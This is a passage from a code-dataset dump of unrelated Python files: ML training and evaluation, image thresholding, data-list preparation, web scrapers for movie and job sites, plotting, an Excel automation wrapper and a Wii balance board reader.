self._start_word)\n X = np.concatenate([X, X2])\n Y = np.concatenate([Y, Y2])\n\n feed_dict = {}\n feed_dict[self._words] = X\n feed_dict[self._target] = Y\n feed_dict[self._batch_size] = np.shape(X)[0]\n feed_dict[self._seq_length] = [np.shape(X)[1]] * np.shape(X)[0]\n\n _, loss = self._sess.run([self._train_op, self._avg_neg_log],\n feed_dict=feed_dict)\n if self._summary_writer:\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='Train/loss',\n simple_value=loss)])\n self._summary_writer.add_summary(summary, self._train_calls)\n self._train_calls += 1\n\n return loss\n\n def eval(self, episode):\n 
\"\"\"Ignore support set and evaluate only on query set.\"\"\"\n X, Y = convert_tokens_to_input_and_target(\n episode.query, self._start_word)\n\n feed_dict = {}\n feed_dict[self._words] = X\n feed_dict[self._target] = Y\n feed_dict[self._batch_size] = np.shape(X)[0]\n feed_dict[self._seq_length] = [np.shape(X)[1]] * np.shape(X)[0]\n avg_neg_log = self._sess.run(self._avg_neg_log, feed_dict=feed_dict)\n if self._summary_writer is not None:\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='Eval/Avg_NLL',\n simple_value=avg_neg_log)])\n self._summary_writer.add_summary(summary, self._eval_calls)\n self._eval_calls += 1\n\n return avg_neg_log\n\n def sample(self, support_set, num):\n \"\"\"Ignore support set for sampling.\"\"\"\n pred_words = []\n word = self._start_word\n\n state = self._sess.run(self._cell.zero_state(1, tf.float32))\n x = np.zeros((1, self._time_steps))\n for i in range(num):\n x[0, 0] = word\n feed_dict = {}\n feed_dict[self._words] = x\n feed_dict[self._batch_size] = 1\n feed_dict[self._seq_length] = [1]\n feed_dict[self._initial_state] = state\n\n probs, state = self._sess.run([self._prob, self._state],\n feed_dict=feed_dict)\n p = probs[0][0]\n word = np.argmax(p)\n pred_words.append(word)\n\n return pred_words\n","sub_path":"src/models/lstm_baseline.py","file_name":"lstm_baseline.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57131908","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimg = cv.imread('1.jpg',0)\nimg = cv.medianBlur(img,5)\nret,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\nth2 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_MEAN_C,\\\n cv.THRESH_BINARY,11,2)\nth3 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv.THRESH_BINARY,11,2)\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\nimages = [img, th1, th2, th3]\n\n\n# for i in range(4):\n# plt.subplot(2,2,i+1),plt.imshow(images[i],'gray')\n# plt.title(titles[i])\n# plt.xticks([]),plt.yticks([])\n\n\nedged = cv.Canny(th3, 170, 200)\n(cnts, _) = cv.findContours(edged.copy(),\n cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\nfor c in cnts:\n x, y, w, h = cv.boundingRect(c)\n if w>5 and h>10:\n cv.rectangle(img, (x, y), (x + w, y + h), (255,255,255), 1)\n \nimg = cv.resize(img,(1000,1000))\ncv.imshow(\"th3\",img)\ncv.waitKey(0)\n# plt.show()","sub_path":"adaptivethresholding/thresholding.py","file_name":"thresholding.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572203185","text":"###############################################################\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tprepare_PLSD_filelists.py\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\t\tsplit the file into training and testing\t\t\t\t\t\t\t\t#\r\n#\t\t\toutput: train_files_for_val_on_city_%s.txt\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\ttrain_files_for_val_on_city_%s.txt\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tAuthor: Yuheng Lu\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tMail:\t\tyuhenglu@pku.edu.cn\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n###############################################################\r\n\r\nimport os\r\nimport math\r\nimport random\r\nimport 
argparse\r\nfrom datetime import datetime\r\n\r\nDEFAULT_DATA_DIR = '../../data/PLSD'\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--folder', '-f', help='Path to data folder',default=DEFAULT_DATA_DIR)\r\n\tparser.add_argument('--h5_num', '-d', help='Number of h5 files to be loaded each time', type=int, default=8)\r\n\tparser.add_argument('--repeat_num', '-r', help='Number of times each loaded h5 list is repeated', type=int, default=2)\r\n\targs = parser.parse_args()\r\n\tprint(args)\r\n\t\r\n\troot = args.folder\r\n\t\r\n\tpath_dir_citys = sorted(os.listdir(root))\r\n\tcity_num = len(path_dir_citys)\r\n\tcity_h5s = [[] for _ in range(city_num)]\r\n\tprint(city_h5s)\r\n\r\n\tfor city_idx,city in enumerate(path_dir_citys):\r\n\t\tfolder = os.path.join(root, city)\r\n\t\tdatasets = [dataset for dataset in os.listdir(folder)]\r\n\t\tprint(datasets)\r\n\t\tfor dataset in datasets:\r\n\t\t\tfolder_dataset = os.path.join(folder, dataset)\r\n\t\t\tfilename_h5s = []\r\n\t\t\th5_filename = os.listdir(folder_dataset)\r\n\t\t\tfor filename in h5_filename:\r\n\t\t\t\tif filename.endswith('.h5'):\r\n\t\t\t\t\tfilename_h5s.append(os.path.join(folder_dataset,filename))\r\n\t\t\t\t\t\r\n\t\t\tcity_h5s[city_idx].extend(filename_h5s)\r\n\t\t\r\n\t\tprint(city_h5s[city_idx])\r\n\t\r\n\t\r\n\tfor city_idx,city in enumerate(path_dir_citys):\r\n\t\ttrain_h5 = []\r\n\t\tfor idx in range(city_num):\r\n\t\t\tif idx != city_idx:\r\n\t\t\t\tfor filename in city_h5s[idx]:\r\n\t\t\t\t\ttrain_h5.append(filename)\r\n\t\t\r\n\t\trandom.shuffle(train_h5)\r\n\t\ttrain_list = os.path.join(root, 'train_files_for_val_on_%s.txt' % (city))\r\n\t\tprint('{}-Saving {}...'.format(datetime.now(), train_list))\r\n\t\twith open(train_list, 'w') as filelist:\r\n\t\t\tlist_num = math.ceil(len(train_h5) / args.h5_num)\r\n\t\t\tfor list_idx in range(list_num):\r\n\t\t\t\ttrain_val_list_i = os.path.join(root, 'filelists','train_files_for_val_on_%s_g_%d.txt' % (city, list_idx))\r\n\t\t\t\tos.makedirs(os.path.dirname(train_val_list_i), exist_ok=True)\r\n\t\t\t\twith open(train_val_list_i, 'w') as filelist_i:\r\n\t\t\t\t\tfor h5_idx in range(args.h5_num):\r\n\t\t\t\t\t\tfilename_idx = list_idx * args.h5_num + h5_idx\r\n\t\t\t\t\t\tif filename_idx > len(train_h5) - 1:\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tfilename_h5 = train_h5[filename_idx]\r\n\t\t\t\t\t\tfilelist_i.write('../' + filename_h5 + '\\n')\r\n\t\t\t\tfor repeat_idx in range(args.repeat_num):\r\n\t\t\t\t\tfilelist.write('./filelists/train_files_for_val_on_%s_g_%d.txt\\n' % (city, list_idx))\r\n\t\t\r\n\t\tval_h5 = city_h5s[city_idx]\r\n\t\tval_list = os.path.join(root, 'val_files_%s.txt' % city)\r\n\t\tprint('{}-Saving {}...'.format(datetime.now(), val_list))\r\n\t\twith open(val_list, 'w') as filelist:\r\n\t\t\tfor filename_h5 in val_h5:\r\n\t\t\t\tfilelist.write(filename_h5+'\\n')\r\n\r\n\t\r\n\t\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"data_conversions/prepare_PLSD_filelists.py","file_name":"prepare_PLSD_filelists.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"224889655","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport pickle\nimport numpy as np\nimport sklearn.linear_model as lm\nimport sklearn.metrics as sm\nimport matplotlib.pyplot as mp\n# Read the training data\nx, y = [], []\nwith open('../../data/single.txt', 'r') as f:\n for line in f.readlines():\n data = [float(substr) for substr\n in line.split(',')]\n 
x.append(data[:-1])\n y.append(data[-1])\n# Input matrix as a 2D array: one row per sample, one column per feature\nx = np.array(x)\n# Output sequence as a 1D array: each element corresponds to one input sample\ny = np.array(y)\n# Load the model\nwith open('../../data/linear.pkl', 'rb') as f:\n model = pickle.load(f)\n# Predict the corresponding outputs for the given inputs\npred_y = model.predict(x)\n# Evaluation metrics\nprint(sm.mean_absolute_error(y, pred_y)) # mean absolute error\nprint(sm.mean_squared_error(y, pred_y)) # mean squared error\nprint(sm.median_absolute_error(y, pred_y)) # median absolute error\nprint(sm.r2_score(y, pred_y)) # R2 score, in [0,1]\n# Visualize the regression curve\nmp.figure('Linear Regression', facecolor='lightgray')\nmp.title('Linear Regression', fontsize=20)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\nmp.grid(linestyle=':')\nmp.scatter(x, y, c='dodgerblue', alpha=0.75, s=60,\n label='Sample')\nsorted_indices = x.T[0].argsort()\nmp.plot(x[sorted_indices], pred_y[sorted_indices],\n c='orangered', label='Regression')\nmp.legend()\nmp.show()\n","sub_path":"AI/ML/code/day02/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"245472388","text":"import os\nimport csv\n\ntotalmonth=0.0\ntotalprofitloss=0\nprofitloss =[]\nmonth=[]\nvaluechange=0\nVal=[]\ni=0\nlist=[]\ntotalvaluechange=0.0\nbankdata = os.path.join('..','..','..','..', 'Resources', 'budget_data.csv')\nwith open(bankdata, newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n # read header\n csv_header = next(csvfile)\n print(f\"Header: {csv_header}\")\n\n for row in csvreader:\n# print(row)\n totalmonth += 1\n# calculating total profit and loss\n totalprofitloss = float(totalprofitloss + (int(row[1])))\n month.append(row[0])\n profitloss.append(row[1])\n def changevalue(startpoint,currentpoint):\n return(float(int(currentpoint)-int(startpoint)))\n\n# print(f\"total month : {totalmonth}\")\n # print(f\"total profit and loss : {totalprofitloss}\")\nfor eachn in profitloss:\n val = float(changevalue(profitloss[i - 1], eachn))\n Val.append(val)\n i = i + 1\nVal[0]=0\n#print(f\"total value change :{Val}\")\n#calculation Average change Value\nfor i in range(len(Val)):\n totalvaluechange = totalvaluechange+Val[i]\nAveragevaluechange=round(totalvaluechange/i,2)\n\n# finding greatest increase and Decrease\nmaxval=max(Val)\nminval=min(Val)\nx=Val.index(maxval)\ny=Val.index(minval)\n\n\n#val_zip=zip(month,profitloss,Val)\n\n#printing final output\n\nprint(f\"Total Months: {totalmonth}\")\nprint(f\"Total: {totalprofitloss}\")\nprint(f\"Average Change: {Averagevaluechange}\")\nprint(f\"Greatest Increase in Profits: {month[x]} (${maxval})\")\nprint(f\"Greatest Decrease in Profits: {month[y]} (${minval})\")\n\n","sub_path":"python/PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"575697558","text":"# -*- coding: utf-8 -*-\n# @Time:2021/3/15 14:22\n# @Author:\n# @File:1_maoyanmovie.py.py\n# @Software:PyCharm\nimport requests\nfrom fake_useragent import UserAgent\nimport random\nimport json\nfrom lxml import etree\nimport time\n\nrequests.packages.urllib3.disable_warnings()\nua = UserAgent()\nua = ua.chrome\n\n\ndef crawel(url):\n headers = {\n \"user-agent\": ua,\n }\n res = requests.get(url, headers=headers, verify=False, timeout=15)\n # time.sleep(5)\n # print(res.text)\n return res.text\n\n\ndef parse_xpath(html):\n results = []\n html = etree.HTML(html)\n title_xpath = \"//h2[@class=\\\"m-b-sm\\\"]/text()\"\n 
score_xpath = \"//p[@class=\\\"score m-t-md m-b-n-sm\\\"]/text()\"\n # type_xpath = \"//div[@class=\\\"categories\\\"]//span/text()\"\n for i in range(0, 10):\n result_dict = {} # 注意字典的位置\n type_xpath = f\"//div[@class=\\\"el-col el-col-18 el-col-offset-3\\\"]/div[{i + 1}]//div[@class=\\\"categories\\\"]//span/text()\"\n result_dict['title'] = html.xpath(title_xpath)[i]\n result_dict['score'] = str(html.xpath(score_xpath)[i]).strip()\n result_dict['type'] = \";\".join(html.xpath(type_xpath))\n print(result_dict)\n # print(result_dict['type'])\n results.append(result_dict)\n # print(results)\n return results\n\n\ndef save_txt(result):\n with open(\"./data/1_maoyan.txt\", \"a\", encoding='utf-8') as fp:\n fp.write(str(result) + \"\\n\")\n\n\ndef main():\n results_list = []\n for i in range(1, 11):\n url = \"https://ssr1.scrape.center/page/{}\".format(i)\n # time.sleep(random.randint(3,5))\n # print(url)\n html = crawel(url)\n results = parse_xpath(html)\n for item in results:\n save_txt(item)\n\n\nmain()\n","sub_path":"python爬虫/spider_center/1_maoyanmovie.py","file_name":"1_maoyanmovie.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533534211","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom datetime import datetime, timedelta\nfrom copy import deepcopy\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport yaml\n\nsys.path.append('../../wavy')\n\nfrom graphicsmod import make_val_ts_fig_op, make_val_scatter_fig_op\nfrom ncmod import get_arcmfc_stats, get_arcmfc_ts\n\n# parser\nparser = argparse.ArgumentParser(\n description=\"\"\"\nCreate validation figures for validation files based on satellite altimetry.\nUsage:\n./op_figures.py -mod mwam4\n \"\"\",\n formatter_class = RawTextHelpFormatter\n )\nparser.add_argument(\"-mod\", metavar='model',\n help=\"model to be evaluated\")\nparser.add_argument(\"-sat\", metavar='satellite',\n help=\"satellite mission to be used for collocation\")\nparser.add_argument(\"-reg\", metavar='region',\n help=\"region of interest\")\nparser.add_argument(\"-d\", metavar='date',\n help=\"month to be plotted fmt: %Y%m\")\nparser.add_argument(\"-path\", metavar='outpath',\n help=\"path to where files are to be stored\")\n\nargs = parser.parse_args()\n\nvarlst = ['Hs']\nnow = datetime.now()\n\nif args.d is None:\n fc_date = datetime.now()\nelse:\n fc_date = datetime(int(args.d[0:4]),int(args.d[4:6]),1)\n\nleadtimes = [0,24,48]\n\nif args.mod is None:\n args.mod = 'mwam4'\n\nif args.sat is None:\n args.sat = 's3a'\n\nif args.reg is None:\n args.reg = args.mod\n\nif args.path is None:\n args.path = '/lustre/storeB/project/fou/om/waveverification/'\n\n# make a list of validation metrics for various lead times\nrmsd_lst = []\nbias_lst = []\ncorr_lst = []\nSI_lst = []\nnov_lst = []\ndtime_lst = []\nfor element in leadtimes:\n # Get stats ts\n inpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'ValidationFiles/'\n + fc_date.strftime('%Y/%m/'))\n filename_stat = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_val_ts_lt\"\n + \"{:0>3d}\".format(element)\n + \"h_%Y%m.nc\")\n valid_dict, dtime = get_arcmfc_stats(inpath + filename_stat)\n rmsd_lst.append(valid_dict['rmsd'])\n bias_lst.append(valid_dict['bias'])\n corr_lst.append(valid_dict['corr'])\n SI_lst.append(valid_dict['SI'])\n nov_lst.append(valid_dict['nov'])\n dtime_lst.append(dtime)\n\nvalid_dict_lst = {'rmsd':rmsd_lst,\n 
'bias':bias_lst,\n 'corr':corr_lst,\n 'SI':SI_lst,\n 'nov':nov_lst}\n\n# Make ts-plots\nfor val_name in valid_dict_lst:\n filename_fig = fc_date.strftime(args.mod \n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_fig_val\" \n + \"_ts_\" + val_name\n + \"_%Y%m.png\")\n ts = valid_dict_lst[val_name]\n make_val_ts_fig_op(val_name,ts,dtime_lst,filename_fig,leadtimes)\n\n# Get collocation ts\ndtime_lst = []\nsHs_lst = []\nmHs_lst = []\nfor element in leadtimes:\n inpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'CollocationFiles/'\n + fc_date.strftime('%Y/%m/'))\n filename_coll = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_coll_ts_lt\"\n + \"{:0>3d}\".format(element)\n + \"h_%Y%m.nc\")\n dtime, sHs, mHs = get_arcmfc_ts(inpath + filename_coll)\n dtime_lst.append(dtime)\n sHs_lst.append(sHs)\n mHs_lst.append(mHs)\n\n# Make scatter-plots\nfor i in range(len(leadtimes)):\n filename_fig = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_fig_val_scatter\"\n + \"_lt{:0>3d}\".format(leadtimes[i])\n + \"h_%Y%m.png\")\n make_val_scatter_fig_op(mHs_lst[i],sHs_lst[i],filename_fig,leadtimes,i)\n\n# clean up\noutpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'ValidationFigures/'\n + fc_date.strftime('%Y/%m/'))\ncmd = 'mkdir -p ' + outpath\nos.system(cmd)\ncmd = 'mv ' + args.mod + '*_fig_val*.png ' + outpath\nos.system(cmd)\n","sub_path":"apps/op/support/op_figures.py","file_name":"op_figures.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"23431290","text":"from multiprocessing import Pool\n\n\ndef cube(number):\n return number * number * number\n\n\nif __name__ == \"__main__\":\n numbers = range(10)\n\n p = Pool()\n\n # by default this allocates the maximum number of available\n # processors for this task --> os.cpu_count()\n result = p.map(cube, numbers)\n\n # or\n # result = [p.apply(cube, args=(i,)) for i in numbers]\n\n p.close()\n p.join()\n\n print(result)\n","sub_path":"Multiprocessing/process_pool.py","file_name":"process_pool.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"594440312","text":"import win32com.client as win32\nimport re\n\nclass Excel:\n def __init__(self,filename = None):\n self.xlapp = win32.Dispatch('Excel.Application')\n if filename:\n self.filename = filename\n self.xlbook = self.xlapp.Workbooks.Open(filename)\n else:\n self.xlbook = self.xlapp.Workbooks.Add()\n self.filename = ''\n self.xlapp.Visible = False # hide the Excel window while operating\n self.xlapp.DisplayAlerts = False # do not pop up alerts\n\n\n def creatSheet(self, before=None , after = None , name=None):\n sht = self.xlbook.Worksheets.Add(Before = before,After =after)\n if name:\n sht.Name = name\n\n def renameSheet(self, sheet , name):\n try:\n self.xlbook.Worksheets(sheet).Name = name\n except Exception as e:\n print(e.args[0])\n\n\n def save(self,savefilename = None):\n if savefilename:\n self.filename = savefilename\n self.xlbook.SaveAs(savefilename)\n else:\n self.xlbook.Save()\n\n def close(self):\n self.xlbook.Close(SaveChanges=False)\n self.xlapp.Application.Quit()\n\n def getCell(self, sheet , row , col):\n \"get value of one cell\"\n sht =self.xlbook.Worksheets(sheet)\n return sht.Cells(row , col).Value\n\n def setCell(self, sheet , row , col , value):\n \"set value of one cell\"\n sht = 
self.xlbook.Worksheets(sheet)\n sht.Cells(row , col).Value = value\n\n def getRange(self, sheet , row1 , col1 , row2 , col2):\n \"get values of a range\"\n sht = self.xlbook.Worksheets(sheet)\n return sht.Range(sht.Cells(row1,col1),sht.Cells(row2,col2)).Value\n\n def setRange(self, sheet , top_row ,left_col , values):\n sht = self.xlbook.Worksheets(sheet)\n right_col = left_col + len(values[0]) - 1\n bottom_row = top_row + len(values) - 1\n sht.Range(sht.Cells(top_row, left_col), sht.Cells(bottom_row, right_col)).Value = values\n\n def getContiguousRange(self, sheet , row , col):\n sht = self.xlbook.Worksheets(sheet)\n bottom = row\n while sht.Cells(bottom + 1, col).Value not in [None, '']:\n bottom += 1\n right = col\n while sht.Cells(row, right+1).Value not in [None, '']:\n right += 1\n return sht.Range(sht.Cells(row, col), sht.Cells(bottom, right)).Value\n\n def fixStringsAndDates(self, aMatrix):\n # converts all unicode strings and times\n newmatrix = []\n for row in aMatrix:\n newrow = []\n for cell in row:\n if cell is None:\n newrow.append('')\n elif isinstance(cell,str):\n cell = cell.strip()\n if is_int(cell):\n newrow.append(str(int(cell)))\n else:\n newrow.append(cell)\n else:\n newrow.append(str(cell))\n # if isinstance(cell, win32.pywintypes.UnicodeType):\n # newrow.append(str(cell))\n # elif isinstance(cell, win32.pywintypes.TimeType):\n # newrow.append(str(cell))\n # elif cell is None:\n # newrow.append('')\n # else:\n # newrow.append(cell)\n newmatrix.append(newrow)\n return newmatrix\n\n def setCellFormat(self, sheet , row , col ,format_str):\n \"\"\"format_str: \"@\" sets cell A1 to text format\n \"yyyy/m/d\" 'sets cell B1 to date format\n \"[$-F400]h:mm:ss AM/PM\" 'sets cell C1 to time format\n \"0.00%\" 'sets cell D1 to percentage format\n \"0.00E+00\" 'sets cell E1 to scientific-notation format\n \"G/通用格式\" 'sets cell F1 to the General format\n \"\"\"\n sht = self.xlbook.Worksheets(sheet)\n sht.Cells(row , col).NumberFormatLocal = format_str\n\n def setRangeFormat(self, sheet , row1 , col1 , row2 , col2 ,format_str):\n sht = self.xlbook.Worksheets(sheet)\n sht.Range(sht.Cells(row1, col1), sht.Cells(row2, col2)).NumberFormatLocal = format_str\n\n\n\n\n\ndef is_int(num):\n pattern = re.compile('^[-+]?[0-9]+(\\.0*)?$')\n result = re.match(pattern,num)\n if result:\n return True\n else:\n return False\n\ndef is_float(num):\n pattern = re.compile('^[-+]?[0-9]+(\\.[0-9]*)?$')\n result = re.match(pattern,num)\n if result:\n return True\n else:\n return False","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"300066248","text":"from wiiboard import wiiboard\nimport pygame\nimport time\nimport ButtonNames\n\n\ndef main():\n board = wiiboard.Wiiboard()\n\n pygame.init()\n\n address = board.discover()\n board.connect(address) # The wii board must be in sync mode at this time\n\n time.sleep(0.1)\n board.setLight(True)\n done = False\n\n b = b'z'\n attacking = False\n while not done:\n time.sleep(0.05)\n for event in pygame.event.get():\n if event.type == wiiboard.WIIBOARD_MASS:\n if event.mass.totalWeight > 10: # 10KG. otherwise you would get alot of useless small events!\n print ("--Mass event-- Total weight: " + str(event.mass.totalWeight) + ". 
Top left: \" + str(event.mass.topLeft))\n\n # leanThreadhold = event.mass.totalWeight / 3.5\n # bottomLeadThreshhold = event.mass.totalWeight / 1.5\n leanPercent = 2.5\n leanDownPercent = 5\n attackPercent = 7\n leftMass = event.mass.topLeft + event.mass.bottomLeft + .001\n rightMass = event.mass.topRight + event.mass.bottomRight + .001\n topMass = event.mass.topLeft + event.mass.topRight + .001\n bottomMass = event.mass.bottomLeft + event.mass.bottomRight + .001\n\n if b == ButtonNames.LEFT_STICK_UP:\n b = ButtonNames.LEFT_STICK_UP_STOP\n print (\"Stopping jump\")\n elif b == ButtonNames.A_PRESS and leftMass / rightMass < attackPercent:\n b = ButtonNames.A_RELEASE\n print (\"Stopping left attack\")\n elif b == ButtonNames.B_PRESS and rightMass / leftMass < attackPercent:\n b = ButtonNames.B_RELEASE\n print (\"Stopping right attack\")\n elif leftMass / rightMass > attackPercent:\n b = ButtonNames.A_PRESS\n print (\"ATTACK from the LEFT\")\n elif rightMass / leftMass > attackPercent:\n b = ButtonNames.B_PRESS\n print (\"ATTACK from the RIGHT\")\n elif leftMass / rightMass > leanPercent:\n print (\"LEANING LEFT\")\n percentLeaning = 100 - (rightMass / leftMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif rightMass / leftMass > leanPercent:\n print (\"LEANING RIGHT\")\n percentLeaning = 100 - (leftMass / rightMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif topMass / bottomMass > leanPercent:\n print (\"LEANING UP\")\n percentLeaning = 100 - (bottomMass / topMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n elif bottomMass / topMass > leanDownPercent:\n print (\"LEANING DOWN\")\n percentLeaning = 100 - (bottomMass / topMass * 100)\n print (\"PERCENT LEANING: \" + str(percentLeaning))\n else:\n print (\"STOPPING\")\n\n else:\n b = ButtonNames.LEFT_STICK_UP\n print (\"JUMPING\")\n\n # etc for topRight, bottomRight, bottomLeft. buttonPressed and buttonReleased also available but\n # easier to use in seperate event\n\n elif event.type == wiiboard.WIIBOARD_BUTTON_PRESS:\n print (\"Button pressed!\")\n\n elif event.type == wiiboard.WIIBOARD_BUTTON_RELEASE:\n print (\"Button released\")\n done = True\n\n # Other event types:\n # wiiboard.WIIBOARD_CONNECTED\n # wiiboard.WIIBOARD_DISCONNECTED\n\n board.disconnect()\n pygame.quit()\n\n\n# Run the script if executed\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/wiiBoardTest.py","file_name":"wiiBoardTest.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128172719","text":"import sys\n\ninfile = open('unit.xyz', 'r')\nL = float(sys.argv[1])\noutfile = open('unit%s.xyz'%str(L), 'w')\nfor line in infile:\n col = line.split()\n try:\n out = '$atom:{0:<10}@atom:{1:<10}{2:<10}{3:<10}{4:<10}\\n'.format(col[0], col[0], float(col[1])*L, float(col[2])*L, float(col[3])*L)\n except:\n out = line\n outfile.write(out)\n","sub_path":"SiO2/addF/h075/unitCellData/relative2real.py","file_name":"relative2real.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117524417","text":"# -*- coding: utf-8 -*-\n#########################################################################\n# 网站: 疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\r\n#########################################################################\r\n\r\nimport scrapy\r\nfrom ZhipinSpider.items import ZhipinspiderItem\r\n\r\nclass JobPositionSpider(scrapy.Spider):\r\n # Define the name of this Spider\r\n name = 'job_position'\r\n # Define the domains this Spider is allowed to crawl\r\n allowed_domains = ['zhipin.com']\r\n # Define the list of start pages this Spider crawls\r\n start_urls = ['https://www.zhipin.com/c101280100/h_101280100/']\r\n \r\n # This method extracts the information contained in the response\r\n # response is what the downloader fetched for each URL in start_urls\r\n def parse(self, response):\r\n # Iterate over all //div[@class=\"job-primary\"] nodes on the page\r\n for job_primary in response.xpath('//div[@class=\"job-primary\"]'):\r\n item = ZhipinspiderItem()\r\n # Match the /div[@class=\"info-primary\"] node under each //div[@class=\"job-primary\"] node,\r\n # i.e. the element that contains the job information\r\n info_primary = job_primary.xpath('./div[@class=\"info-primary\"]')\r\n item['title'] = info_primary.xpath('./h3/a/div[@class=\"job-title\"]/text()').extract_first()\r\n item['salary'] = info_primary.xpath('./h3/a/span[@class=\"red\"]/text()').extract_first()\r\n item['work_addr'] = info_primary.xpath('./p/text()').extract_first()\r\n item['url'] = info_primary.xpath('./h3/a/@href').extract_first()\r\n # Match the /div[@class=\"company-text\"] node under the ./div[@class=\"info-company\"] node\r\n # of each //div[@class=\"job-primary\"] node,\r\n # i.e. the element that contains the company information\r\n company_text = job_primary.xpath('./div[@class=\"info-company\"]' + \r\n '/div[@class=\"company-text\"]')\r\n item['company'] = company_text.xpath('./h3/a/text()').extract_first()\r\n company_info = company_text.xpath('./p/text()').extract()\r\n if company_info and len(company_info) > 0:\r\n item['industry'] = company_info[0]\r\n if company_info and len(company_info) > 2:\r\n item['company_size'] = company_info[2]\r\n # Match the ./div[@class=\"info-publis\"] node under each //div[@class=\"job-primary\"] node,\r\n # i.e. the element that contains the recruiter information\r\n info_publis = job_primary.xpath('./div[@class=\"info-publis\"]')\r\n item['recruiter'] = info_publis.xpath('./h3/text()').extract_first()\r\n item['publish_date'] = info_publis.xpath('./p/text()').extract_first()\r\n yield item\r\n\r\n # Parse the link to the next page\r\n new_links = response.xpath('//div[@class=\"page\"]/a[@class=\"next\"]/@href').extract()\r\n if new_links and len(new_links) > 0:\r\n # Get the link to the next page\r\n new_link = new_links[0]\r\n # Send another request to fetch the data of the next page\r\n yield scrapy.Request(\"https://www.zhipin.com\" + new_link, callback=self.parse)\r\n\r\n ","sub_path":"h0Pythonweb/codes/20/ZhipinSpider_pygal/ZhipinSpider/spiders/job_position.py","file_name":"job_position.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
